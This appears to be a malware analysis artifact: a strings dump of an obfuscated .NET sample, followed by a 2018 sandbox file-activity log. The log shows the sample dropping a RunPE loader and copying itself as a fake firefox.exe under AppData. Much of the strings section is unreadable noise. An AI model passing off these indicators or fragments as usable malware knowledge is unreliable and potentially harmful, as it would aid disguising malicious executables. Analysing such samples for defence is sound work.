'tRs
j1G?
^ 5&_
]-ih
set_Key
?[T@]
kKa8E
^(,/J
ocvh
^uef
' vE
Omw<
[Hc^
n_ $CY
E~"?
h uk
JT[f
Ftzs
k7~h)!
s' T
)J4B
o=e%6:
G<^%-
{G{u
5/S1
*9U
M4$R
;kON
gV`}1E
!)ZC
(cV2
Gr%Ew
Attribute
49u @
\gt=nE
:sMd
{=PNz
MethodInfo
o y2
nY]I
bk,r*XPs
nN[lm_
NY]^W
rVT^
8;f>
PQ}<Dx
N&E
heDE6
8'bg5
f'^G,[
!r R
<i~
z#Y
*`c1H*V
6]
4~&8
2\<K@
iFn2*
MemoryStream
]Pp2K|y
ycK:
o2yn/
p Z1
I=J j
"v]M
^{:(=
SN,
+8M9
f>f
"c@1
H}Pc
ocj?
obOx
trLz
dbjd
ynI1
nPe,
)j;v
s:PC
dZW@;'!
=d`y
;&/ n
}D_%
P7H-
=2dL]
?_+cI
be.t"'
M~_;
PL`|
\l0 [&
9[1.c{
X%\T
<I)V
k8G
@A6Fs!
)*z1
l=cL
{ 7
wUtV0
Z1 x
.{Yx
]uv}Io
B 8_
:h`c
>u,o
0PC!
56.]
NmI`
m{X9
R}EU
BC:Ra
8^+/E
Microsoft.VisualBasic
)`ZD
0:>
4nmq<x
sB[T
P$ Z
Xiz]
olX;
wbL6
#@sd)
kJ3k
?l)p
s.g'
8#H^
Xo;
-YE\a
: Dm
: !6
5x?t
u+z}Y
3tCkV=a
bb`Mg
G"xCk+`@
5a[f
7>!V
4x`)!
Ogvy
XAzo
nPr*<
\o<!X
]v.s
=8&>
&K0V
@rMA
-8 \
Pv=iq,r
q_y0\g
_jF6
|T*F
SJc0
f.[}js.
get_Message
RuntimeCompatibilityAttribute
TH/<~,/n
wZ4v
{$ CVq
O<< _
CT<.
4;_s
|h6{Z
CR2_
xGDl
hg"ZD
X`"%Vu
LaLz
@Jnl
BD <
@i>w
,mp[
Is"u
89TQ
pzW|
~f!_
HfWF
3ss%
t#X\9dURHTp3vrAR&_T_6?
Sa7V
StringBuilder
.y16
}~4~
DK=SH
4=u+s
v?q8
,7#Mc
XcZl#
._}BZ
udne{
dc{?
vyOD
| r@
Y *$
F U
vmeaW:4s
-fFu"
:,<M
#U]R
$Am&b
hrsPh
tcqR
tAdt
c6mm
ocNr
v;F{uY
RK]2.t .k
25Gf0=[
=1>+,%
|9ze/o
$wkn
Z*tR
#Xu?
^]kt
m?S]V
8 eS
M]FF(>
s1%\
D_HG
sQ8Zz
>HN_
J#?
^ O.
}6 Di
t'/G
[i-2S
3A~V
(8QU
]ZvT
<E5R
Thread
imEw
*"y}~3~C\
~]+c
3YzpC
B`v
9U]@
eRx4
J3Ae
DM8*
HgO/
_}:5
".&>
i1K?
a3R'
hf1
8!FJ
,O?
#C4N
-)jRE
6b8;
)8r,
t[_s_
System.Resources
$t/.
fI15
MKJP3pU
?=,q&
; `.n
O+X1
< (J
[2Fa
2duX
89&S6
~nCC
8O.+
:Onb
gcJC t-
%HEd_
w>|
UA7(
gdv V {5
=S&W
V=gZ
_>-k"
dP[\
;g|./
td%Y
Bq,K
4 L( x
Sf j.89Ef
|ukb
'32h@U
%3AZ
4BtEM
7}J%
]9=x7
9)yV
:QvWW
%`}G
&(vX
'a 2\x
>n*1
oe80
AUc]
44ZY
)X\
,edo
T% w
+<&{]
/)PLyt
wY[+u
yd`D*
)#6Vv N
! w!7"Q
9x=oLv(
du#_
[2$l)S
wDVe{
I#+mQ
+46b
($>U
A>f
Byte
Ny n
YGUI
P5}
:+[Y
mAa8
C_p8
(=Jl
t5(\8u=
CJA-
O1g/
Ck@:i
33`/,
?" dK
u_tb
]5nc
w8k\h
2uqL
xYsg
=soi
(r?+Hq
xH IW
oT++
$wK1h
<>g>
0SN5w
l&oE.
m ?n
4M+[
f`Ia
-Gl_v7
jJK!
MJ6X[&
String
+V`L
ki'1
_CorExeMain
1wUC
wc?VVdI
nkdY
#i$?N
K AxD4
@j9=qj
K69
^g;d~
PpG
PI;I
xI*`
{1a!
get_CurrentThread
sX#(
f.Qv
FO38
1[zs
S-6H
*J6)
d2[x!
v9SU
InitializeArray
(gC6
Sg{0@q
9>nu-
-q*+_w
.n1x
~` a
'af'
+\Vz
s{4C
+@uU
M1ao)
_#*&~
.52(Fp:
WN gZ=
b_ 0
Bk)L
,L/wp
GaAE
G+ j!i
*B8
`p V
UnverifiableCodeAttribute
[L70x
r^`j
hCT:+
"0DB
QN,{a
/5M}m
;N\8
kGT7
` FQ
ParamArrayAttribute
XK$k
bw7;|4H
fast
y.X0
T6?Re
PeBG
v\i|2
D;7
_bk+
l,oyv~
V%a8
u<FH
sa86
+AGW
S>'e
~ GS
`U/Y
ErX~R
m1wt
}he|
iX"6
1rs
wN =
FYQO
TF+;AM
Load
qA*r
l=8F
r]h{e-
i-:h"
2?5"u
s{(jy
2 T
/"$M
uMdq[i]
l|RT
E*TC
Nl-W
:Fu[
: )r
sy*g
%b7-vd
1C"0
E:{#pT
yBJ]
f'b"cU&
[*Qk*
W-Ni
0@[ w#j#
40[\^
MT0
?6Mn
pjTkU
#erX@
*l5o
3 *3
e:z;
>"Rl
ehFS
z5o83
%SYr
#j5.
]vR-
#c59
>!IF
krFRV
fmW%
:U7V
mNx/
1:}R
83zB
.lsQ
NCZ+
^. 2t
#l] w
bX
jmgM
BA:_
/Wvv
R5==H\
j3qh/O
|4Q
6oI/
DlpO
_.],
h[m.
9*DI{
.8*8L
9{fi
yBTu_
].!h{x
!-+1
raqO
G*{o
n:ql
?Oz ]
nI1
m|ZHfm
;L%y
UDG|@=
#32e
p&R`B
T,:@
5wqD
'%"/
aL KB
~#M4
*~9K
Z@t{
w^d
46Un
o7G
1 )
f?YW3
* az
P 5DUK
ejn J
V )
ks3P
s&vY
>b(Y
0=}L B
SGG1
[Q`a
V%}Hs
v^H7
4V?E?
j@rW
?U?+r
^/w2
'KJ,~
L*9^
wW{IkQ
~)6kO
HW?(
FP;/
I#/F#
6E>E
Bpf<3
}`vJ
H0w
8K8&
>+9s{^\F
IsLogging
`6 F
$NZ@
hzG4
^FT1
0f:`E
/B%fKn
PCaQ
$2vVj-r
get_IsAlive
4Cpb
C.+\
Ov~J
Z2BL
T0Q*2D
5Ki0a
?t- k5
Q!@^|U
J<Ne^
`GbC
get_IsAttached
Q np
y X?
n"1I
_!^b
9o-c
9Y "RWVF
OJ"[
81L0
E Qc
1PBX
.j S
F?kj
,T2R(HO\
_"v
wRz6,$s
A oc
$> 3
n*0~
rtK+v
?~'Cg
~N{J
Encoding
,a>v
tV%7
'JK#$
Z*G
4kfI
:U@V[
J,@.]}Rgx
[P~*WP
~=)h
&,wY
\ZK|
DoZA
iquLMe
=FaL
d 0Ae4S
,tn^
AF`6B;
Stream
g8Jd
M>yo
Z iI.1
" )&
S pX
]`B0%
>*I_
m[5
V 5
FailFast
. 4@Z
p< 5:
get_Module
]c 8
{J">m
ewtE
g5GP
gj>)
W39R
)}T^h
&16r
rr^]*
A= U
3J E
FSm|
Vcy_
CompilationRelaxationsAttribute
6:,0
?}61f
3MY'F
ES\A
%]F?v
.zcB
:y,2
/a?V
n6/q
*Xt
}U+0q
@q)QY
>(aj
X$T
=t*_=4=jw9
\WYD
<X!1,
$2>a
]h"`
td.*
D;Q
}6(j:
`8YH
) W5?
eE[.
hi>+
0U&v
x pZ
1uw)
3JO}7w
WJ+5
MY'j
-zGO
o[$v
*}yw
@,VS
NQKI
]hXh1k4
+SKs.
v2xt
j%hF
hN4k
lI@_
_R;v
M8|t
]am^
L:WZ
3%qn\
f5AC
yb5r
p^j;~Fd
[8'WZ
B+q+a
O^cZQR
,|Vw#
]CL@6
u(^\ #
0DC_k
(O<
Xr9Y S
c$
|eeI
C._6
@ fF/u
Ituq
@{ +
f[+47>2Wl
i9B,
,cEH(
'fg2[
k_V^9r
!QL=
csuY
YR*
8\Qt}Wm*|
DL]c
LCPY
J3VD
DJo0
?LJ:
=}/Tk
3|g`
($N4
9 Gi#
SJ1Q{
Z_oW
n(Dk
?(Z
System.Threading
]A`-
`^I
5.ZK
nJ{`
|N?`+
udVU
,;U&
hv%r
^n%
p|o[
@?b@r
|;C1ra^
F,IBw
>Kls YL
|OSy2-
LHv:
H@,T
+D+D
Xq}e~5
uB)=
$KSD
ResolveEventArgs
KY
*[bc2
ED~%
B!(.
UoM
Uy#
JJ P
" 8eM
#,/:I
9`]3
P=M>
Bhwp]
n1gV2 ~
3g Y<
'E3}
1gCH
qt7AS
01~D
MA]CohYV
ontX4
nu'ko
&V1c
*KhC
$x;
:<ht
Buffer
pE6rR
A82
-Y+9
L)oo
O# @
*AlV
, <m
ou{D
EKi+
#E_
/_HCe
{}S%
<]Mmn
8z1Y
B# j)W+>-
}YTMO
i[ ~n
hpTp9[
t$e0
{>cb3n^
u1I d,m .`>
Z7ug
1;<M^
\AQ@A
g@ f
XMn;
z<EJ!
rO=F
2&{>
B<x"
Debugger
>[j.Xt
-P 3Ix
~K,S
" 9m<
o]S?
?Lv
T"C;
"Co.K[9
0SMX(gB
eGWi
@{{f
tGPz
$.oJ 46/M
?] |
O4o=r
(Pz V[
5C *s
2 {H
?:t"
SASYs%
-6-0
W+qz
Y$bAqa
Z|B7}
,ke` 3L
7C
r;h}6)
7z};
wGbh
&>%
=X 3
@/>*r$
9MFH\
Z>Pb
\~a=pQ
50FL
Z(F(
F,~}Gun
XTe$
Atwv1
WSsI
nt e
r `;
q/Ja
:GxaA
^_wS
3j3
;<d'y
vcH7@
vAL#
lT2N
QutT
u (V4d
/c6 h
\Wrd
Uch"
8 Vj
3|1
{W~9
/u#8
c_OL
aw/U`
]#8Qq
NN+r
' >
,6
f]^z"`+7
c3ORkwE
7T"y
BA[LG
rf:
$sI
; (c
t+>k
t[ eqYM
v2.0.50727
x<fWq
4fV,
_rmSZ
s>aq
Rgs
n8eV
i&r'
{JS-
f:P@F
'+N)
w0RP
^K=:d q
uYM7
Bin:
>h<WG
<uD
7;%b
fBouG
`<
s5xvl}<v
b!Te
J 3.
5MzF
5qW6A
iyiQ
3-l>
Hr-l=
%T$V
:_ <
7(Ug
$v '
ValueType
)/`7
|;+,
GB|Y.
=F)T
JCAF
Cim~
7/T^
AdJ?
T'.~
SK4j
+34_g
)e##
:nO&
a SEI
{MA
)Lte
C H
wnZn
nWV[
J#tP
bsV++
QJsS
G: 4
p@s<
@7F
HN|W
en)AR
9,,f
Jyt:
#NGb
*;&Zt
[5WG
uK9b
>^#
B4 !
GetTypeFromHandle
1Y:Y
ec=rD
H0F;;lRR
r2S:
}~X
l|S2
ShH?'
Ez53
NRL?
>Vt4e
US3,
aW?I[?#
+L"f
2X*IM
8pk
t5,X
wV$
5GYa
MSQ}
O ]V(
Jnt
=tGh
qCqa
VkIc
, _u
)'&{
Ll5~D
dMJ ~9
<8O>V
*!~}J
JZ= D(
FS!<
i?^=Te
1 -tI
vbyQBc1
xRax~
ConfusedByAttribute
k3D4
cP)
ie9&
B*=b
l*j*
$ Y
vi'@c
aqi
@o} H
hWj h
}E,^
KI a
f.1wF
b-Gn
?F U
tqKC
Y^{m
:S1c
D;1Q
kaeU?>
YZc[
?d;.61rG
55jU
Qfz|
o'F7c
System.Collections.Generic
^\s&
TYb'
0n<P
-EaOe
SIn2
P>Wq
System.Runtime.InteropServices
Q]v'o
?^W'
Ym -
0*D^<
IE!o
J*')
R|C
Math
;}Cn
)T!Z
K{x3E9w
F! Y
.'9X
P ~h
JT|V~
~kif
K|dp
? W~
Gbgs
l b6b`
v48*h(<
AG 3
na4gT
}05#v
Bhj{
42mM
Tw}m
+%/vIa;
yiJd
'}A#K
\'b2
System.Runtime.CompilerServices
x'"9
p>(lD_
@9q3
geXX
W*R@H
Mq"?
^w' dr

OE4_j
-PK
9o+U
uuL4
n$iJ
B xK-=
amw9
8ZhY
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
A%\`
ug=K
ve&l
+Vz)
LTPXR;
sv9>|?
N~Gmk
mvMe
>"7E
\SF V20
JFN)<,
(x8"
8e7%
7M
xQe{7^qN
6n(
i[SJ
#IFhhS Z
- }
o<m$
xJoA
&Bmv
Y *a*
SC b8
dW\$
'Wa8
! uD
C_,%
uK1b&
_*/Ty
2W3 }
`Z1|x
oPu=b
r-B*
{Rk-~
&}_
_aX|
FAWcReW
b29t
l^tj
n?}U}n
s-n#l
< ]=
=Wrz
|] _
<SRC8|=X
,I54W
=szEe
4e 4
W]THu}
2ysE$
;pT\
I[9O
E!0 V
L_qm
osR\7V`=
qDv0
8L
`Q4N]kSfM
(P)M/5
Q3IL
frt
;'}D
w?L{
C}o
6?-Q
A+K&D
$&Sb
11)k
K:"Y
3s>^X
6 z|
1P/8
1j`t
]~.h
@nC?Nu
get_Assembly
&Zka
jxjLSlVUfzUNLPnbjrGfRKMKxxZv
lUXe
E@34l
XWlr
3O,"B
Bt!I
D$f5
1f%F
WTM
Vk>V
>K n
X-l<
/WxG=6\
smh-
GGjHg
2$87
:%-Z
Z`F@o
'i_m
}W;\
]'V\
!LVxp
zb^)0e
j ,`i3
H<?<X
J()s
~<ws
dq`ix
e]*<G
^>#r
qtIl
Dy|s
?jI?
m%W6
*Nnb vtsT z
yZ:[
Ch ,:\
|Ne=CR%
q]lJ^m
X Q*
TL^
m^#' X
/MU([
kdrf
[zMV
7XEk
Lk`HjA&
GtIo
#,q?
.P0=
iOF
n4\/[
$QN
pRFbn
;@yY!
]$+ x,{
M di)
@~N]_
~0>?
NU_~
@M#e<
#_9J
F sPr-<
Xvw@
L +q
O ;j
?){}
a\]T
ROA2
b3`*
Bcmv
q7II7Ok1igkxHRPBEjlJ.resources
<V 6
2~J(6
Z$*@
#ywk
>p@Y4
}spb;
L`>B3
55m3(d
ev?\
Z5^
^q]V
}I;@
_4yJ
w+ S
EO %L
cCeX
6X#q
tq/Y5
Gr?i7
, C0
^4Gz
7!LxL%
5vPX
D+1s'
t Y!
))|9
d,xjf
UOn3C+?
RX\cW2;3
:}+hu
$}4z
Read
q<P;|IW
S-26&
Yt@Tx
0Sl8:
( [I
4APR
q5'<
jMkP
hN^vbi
9=p]t
[YAJ
+,b b
d6]q
!W!un
]*L$
^ uVp
nGf$d
1mEfz
)_qc%{
,+ Z
Ol|$
]TV/OS
J/&B
j{Kj
-M*xf|
`UV.
A OR(
)sTGE
qZZ+
R%]?NM
a,v83+1
MSX$ZP
wFHI
^NCM
1{$7
X-Ov?
*9.L
Xe8Al4
Fj5/
2gL"],
[(Fc
System.Text
mscorlib
U[A?M{Dk2}
Qs7h
"04kT
ZFto>L
}9\*
*>H
L0]r1O
[h?+
c*g;@j
>(W^
0<ld
; ) B
1TKQ
.Em:
`;xo
<zZp
*4'H
R_eT g]
HdJNv
TF8dI
DFg~]W
Module
?~u<=P
3iUq
'\^W
x<4HJ
+~;V
IEnumerable`1
gE]sD+
'f0!AC
set_IV
%AqLZM
r4L+
JE48
Z+DMu
4t\=
<T}E
aB8M
T}xo
mwza
@_%6
:] c
6?^?
;pG!2
s@1!
n+$
;z1k2
gYA#
YJM~S
GZ Lj
#8DU
]y5L
=\Ue.;M
h133
)/Bk
>qo{n
w/PyG
k*i$
n[*r
. M-(
*Rz=
A~\$
u4q\
YWy!~
+VtfQ
K \k<
9Rb
jwr|$A
@'#^BIp
k8mO
#&Lh
ToArray
;&t5
X; l
^\FR
EAR
+&mxy
/H#6
?yAT
sji,
b 7<
g4p5L
*v*n
AddMilliseconds
mQO]
sm{d
&7 M
CjO8
H30Q
m^*`
C]a8@
Q<a)
R0W@
B6f*
FU:
{yH!
UB\s 9O
P&S&
n. e
t-w+}0
) NV
mA{f
$=Kt
+"Mrpa
A>Nm
15 .
v7V
spI !8
1^llf
vj)jh
:g;B
.^I|
i(5
NiK,
{8H9P
0Fz_
iu>&#Aa
_+d
7f~[
B5P"
2x@6Q
321T
)M4G
e$=Z \
w ?
%UT[U
2E*-
'$8w
gQ{T
j4vj
lwqVW
)_iR
R6cCa
A5@~
|~"J
}H)g
7-vo
' /i
5|lm
S[=4M
'8*
>J'K
(:aD
<pkBN
p&..+
| AW
W<e1&
Qv^$
y-F6.
(UOB)E
Kriz'c
doY
3MoD
a wS
^Tl)
9"Cq
Ui#\ "
+6HWy
3P)z
j%m~
8 ?@
hKq=
WKhW
# wD3;
:LKz(
TkY
V"(*.s
AddRange
SrbvC
eAH]0
9BJ>j
v hK
)+:0
,ou,O
GetMethod
DjNB
A e(
ICryptoTransform
`w9CQ
G Fg
T!Hj
AIg<{
5B,I
0`P:
JQ5y
CJL hm"Iw
Uh]g
>GE{}k
u*p
h:qMw
aVY]
v&mqQ
[Fp-am
Nl\!
xN7[
} 2LN
WK1
f_?u
H37w
bn Y`FD
|XC<b
"atv[
uJ71\
cpWgg
q|1l^
Eu`l0
*&XFx
{U#dr6
:Rs?
Sleep
G3cMJ
z6EU
+$tn
(Ulsn
q{p"
=KC^
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-05-03 16:13:30 2018-05-03 16:16:27 177

12 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven02_64 Seven02_64 VirtualBox 2018-05-03 16:13:30 2018-05-03 16:16:27 177

10 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\fast.exe.config
C:\Users\Seven01\AppData\Local\Temp\fast.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\fast.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\fast.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\System32\tzres.dll
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Users\Seven01\AppData\Local\Temp\it-IT\fast.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\fast.resources\fast.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\fast.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\fast.resources\fast.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\fast.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\fast.resources\fast.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\fast.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\fast.resources\fast.resources.exe
C:\Users\Seven01\AppData\Local\Temp\jxjLSlVUfzUNLPnbjrGfRKMKxxZv.dll
C:\Users\Seven01\AppData\Local\Temp\jxjLSlVUfzUNLPnbjrGfRKMKxxZv\jxjLSlVUfzUNLPnbjrGfRKMKxxZv.dll
C:\Users\Seven01\AppData\Local\Temp\jxjLSlVUfzUNLPnbjrGfRKMKxxZv.exe
C:\Users\Seven01\AppData\Local\Temp\jxjLSlVUfzUNLPnbjrGfRKMKxxZv\jxjLSlVUfzUNLPnbjrGfRKMKxxZv.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox
C:\Users\Seven01\AppData\Roaming
C:\Users\Seven01\AppData\Roaming\mozilla firefox\firefox.exe
\Device\NamedPipe\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2352.3644671
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2352.3644671
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2352.3644718
C:\Windows\System32\Branding\Basebrd\Basebrd.dll
C:\Windows\Branding\Basebrd\basebrd.dll
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Users\Seven01\AppData\Local\Temp\"C:\Users\Seven01\AppData\Roaming\mozilla firefox\firefox.exe"
C:\Users\Seven01\AppData\Roaming\mozilla firefox\firefox.exe.config
C:\Users\Seven01\AppData\Roaming\mozilla firefox\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\firefox.exe.Local\
C:\Users\Seven01\AppData\Roaming\mozilla firefox\firefox.INI
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\fast.resources.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\fast.resources\fast.resources.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\fast.resources.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\fast.resources\fast.resources.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it\fast.resources.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it\fast.resources\fast.resources.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it\fast.resources.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it\fast.resources\fast.resources.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\jxjLSlVUfzUNLPnbjrGfRKMKxxZv.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\jxjLSlVUfzUNLPnbjrGfRKMKxxZv\jxjLSlVUfzUNLPnbjrGfRKMKxxZv.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\jxjLSlVUfzUNLPnbjrGfRKMKxxZv.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\jxjLSlVUfzUNLPnbjrGfRKMKxxZv\jxjLSlVUfzUNLPnbjrGfRKMKxxZv.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it\stub.resources.exe
C:\Users\Seven01\AppData\Roaming\mozilla firefox\it\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\Update.txt
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Xml\461d3b6b3f43e6fbe6c897d5936e17e4\System.Xml.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.Xml.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\VERSION.dll
